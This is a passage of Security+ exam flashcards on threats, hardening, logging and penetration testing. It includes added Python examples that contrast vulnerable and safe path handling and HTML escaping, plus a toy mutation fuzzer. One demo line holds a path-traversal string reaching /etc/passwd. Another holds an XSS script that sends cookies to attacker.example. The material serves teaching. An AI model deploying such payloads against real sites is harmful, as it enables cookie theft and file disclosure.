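flashcards). Paths and payloads are constructed for illustration."""
import html
import posixpath

WEB_ROOT = "/var/www/site/public"          # hypothetical document root


def resolve_vulnerable(root: str, user_path: str) -> str:
    # Joins unchecked input: '..' segments walk out of the web root.
    return posixpath.normpath(posixpath.join(root, user_path))


def resolve_safe(root: str, user_path: str):
    """Canonicalize, then require the result to stay under root; None if it escapes."""
    root = posixpath.normpath(root)
    # Strip a leading '/' so an absolute path cannot replace the root outright.
    candidate = posixpath.normpath(posixpath.join(root, user_path.lstrip("/")))
    # commonpath compares whole path components, so '/var/www/site/publicx' does
    # not pass as being inside '/var/www/site/public' the way startswith() would allow.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def render_comment_vulnerable(text: str) -> str:
    return f"<p>{text}</p>"                          # raw user HTML reaches the page


def render_comment_safe(text: str) -> str:
    return f"<p>{html.escape(text, quote=True)}</p>"  # output encoding for an HTML body context


def demo():
    evil_path = "../../../../etc/passwd"
    xss = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
    return (resolve_vulnerable(WEB_ROOT, evil_path),
            resolve_safe(WEB_ROOT, evil_path),
            resolve_safe(WEB_ROOT, "images/logo.png"),
            render_comment_safe(xss))


if __name__ == "__main__":
    for item in demo():
        print(item)
```

Decode URL encoding (%2e%2e%2f) before the path check, not after, and escape for the context the data lands in: html.escape is right for element content, while attribute, JavaScript and URL contexts need their own encoders.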
A ___ attack exploits a vulnerability that is hitherto unknown, so no patch exists. Anomaly-based IDS/IPS and heuristic antivirus programs are best at detecting/preventing zero-day attacks.
____ are small text files that pass information between web pages, such as a shopping cart. Tracking cookies and browser history are used by adware. Third-party cookies are from advertisers and should be blocked.
Flash cookies/Locally Shared Objects (LSOs)
contain cookie-like data that a web site running Adobe Flash can place on your hard drive
_____ are browser helpers that may include adware or spyware. Often they are not removed by anti-spyware programs. Unsigned browser helpers should be removed.
____ is the hijacking/reuse of a magic cookie used to authenticate a user to a remote server. Authentication cookies are exploited in session hijacking.
TCP and/or HTTP headers are changed in ____. TCP headers have flags such as URG, ACK, PSH, RST, SYN and FIN, and setting them in illegal combinations is one form of header manipulation. HTTP headers can also be changed so that malicious data is passed to a vulnerable web application.
Attack mitigation and deterrence measures
______ include monitoring of system logs, strong physical security, host & network hardening, port security and a strong security posture.
Physical detective and preventive systems
______ should be updated on a regular basis with the latest countermeasures. Information about protective measures and systems should be kept secret.
______ contains system, security and application logs.
The ______ contains information on system startup, service startup, time changes and backups
The _____ has auditing and log-on information
The ______ contains events that are logged by applications.
______ includes hardware locks, mantraps, video surveillance, fencing, lighting, as well as proximity and badge readers.
______ includes disabling unnecessary services, protecting management interfaces and applications, password protection, disabling unnecessary accounts and applying the latest patches. Web servers should be placed in a DMZ after _____ the OS.
_______ includes alarms, alerts and trends. With constant system changes, managing IT security for servers, workstations, laptops, firewalls, routers and switches is extremely difficult without automation.
________security controls include CCTV, facial recognition software, sign in logs and routine security audits.
________ security controls include an access control system, an armed guard, a mantrap and bollards
______ includes initial baseline configuration, continuous security monitoring and remediation. An initial baseline allows an anomaly detection system to evaluate traffic properly.
A ______ attack can be detected by system resource monitors and baselines. The baseline should be updated whenever software is upgraded on a production system. The configuration baseline should be updated after deploying a new service pack. A security template is used to both deploy and reapply baseline security configurations.
A _____ is an application that checks computers and networks for weaknesses such as missing patches or misconfigurations. Vulnerability scanners can test the security of a network for a wide range of problems without disrupting operations. Examples of comprehensive vulnerability scanners include Nessus and the MBSA. Complementary security assessment tools include port scanners, network mappers and password crackers.
Risk is equal to the probability that a threat will exploit a vulnerability times the cost of the asset. Risk = Threat x Vulnerability x Cost of asset.
The main diﬀerence between qualitative and quantitative risk assessment is that ______ is based on calculations while _____ is based on subjective ranking
______ is more thorough but more disruptive than vulnerability scanning in that it also includes social engineering, buffer overflows and active testing of physical security.
Penetration testing
_____ actively tests security controls on a system by exploiting successive vulnerabilities to bypass them. It should only be conducted after obtaining express written authorization, as it actively tests security controls and can cause system instability. An advantage of _____ over vulnerability scanning is that it proves that a system could be compromised.
_____ is a passive attempt to identify weaknesses.
Penetration testing and vulnerability scanning
_____ and ______should be used when assessing a network containing resources that require near 100% availability.
Black Box, Gray Box, White Box.
The color of the box is determined by what a penetration tester knows about a network before testing.
In____ penetration testing, the penetration tester has no prior knowledge of the network.
In ______ penetration testing, the penetration tester knows what a user knows.
In _____ penetration testing, the penetration tester is given administrative access.
A ____ is an application that discovers security vulnerabilities by sending random input strings to a program. A vulnerability is discovered if that input results in an exception, crash or server error
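Added example (not part of the original flashcards): a minimal mutation fuzzer of the kind the card describes. The target is a constructed record parser with a deliberate length-field bug; the fuzzer mutates a valid seed and reports any input that makes the parser raise something other than its documented rejection error.

```python
"""A minimal mutation fuzzer (added example, not from the flashcards). The target
is a constructed parser with a deliberate bug; the fuzzer collects inputs that make
it fail in a way it is not documented to."""
import random


def parse_record(data: bytes) -> dict:
    """Toy format: 1 length byte, that many payload bytes, then a 1-byte checksum.
    Bug: trusts the length field, so a short buffer raises IndexError, the Python
    analogue of reading past the end of a buffer in C."""
    length = data[0]
    payload = data[1:1 + length]
    checksum = data[1 + length]               # IndexError when data is too short
    if sum(payload) & 0xFF != checksum:
        raise ValueError("bad checksum")      # documented, clean rejection
    return {"length": length, "payload": payload}


def make_valid(payload: bytes) -> bytes:
    return bytes([len(payload)]) + payload + bytes([sum(payload) & 0xFF])


def mutate(seed: bytes, rng: random.Random) -> bytes:
    """Apply one random mutation: bit flip, byte insert, byte delete or truncation."""
    b = bytearray(seed)
    op = rng.choice(("flip", "insert", "delete", "truncate"))
    if op == "flip":
        i = rng.randrange(len(b))
        b[i] ^= 1 << rng.randrange(8)
    elif op == "insert":
        b.insert(rng.randrange(len(b) + 1), rng.randrange(256))
    elif op == "delete" and len(b) > 1:
        del b[rng.randrange(len(b))]
    elif op == "truncate" and len(b) > 1:
        del b[rng.randrange(1, len(b)):]
    return bytes(b)


def fuzz(target, seed: bytes, iterations: int = 2000, rng_seed: int = 1,
         expected=(ValueError,)) -> list:
    """Feed mutated inputs to target; return (input, exception name) for every input
    that raises anything other than the exceptions target is documented to raise."""
    rng = random.Random(rng_seed)             # fixed seed: reproducible findings
    crashes = []
    for _ in range(iterations):
        case = mutate(seed, rng)
        if not case:
            continue
        try:
            target(case)
        except expected:
            pass                              # clean rejection is correct behaviour
        except Exception as exc:              # anything else is a bug worth a report
            crashes.append((case, type(exc).__name__))
    return crashes


def demo():
    crashes = fuzz(parse_record, make_valid(b"hello"))
    kinds = sorted({kind for _, kind in crashes})
    return len(crashes) > 0, kinds


if __name__ == "__main__":
    found, kinds = demo()
    print(found, kinds)
```

Keeping the random seed fixed makes every crash reproducible, which is what turns a fuzzer finding into a bug report; real fuzzers add coverage feedback so mutations that reach new code are kept as new seeds.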
Secure Coding Concepts.
Exception handling takes care of special conditions that change the normal flow of program execution. Software testing can catch exceptional conditions such as bad input and data errors.
Account lockout is a form of DOS. True or False
SY0-401: 3 TS Quiz Threats and Vulnerabilities (96 terms)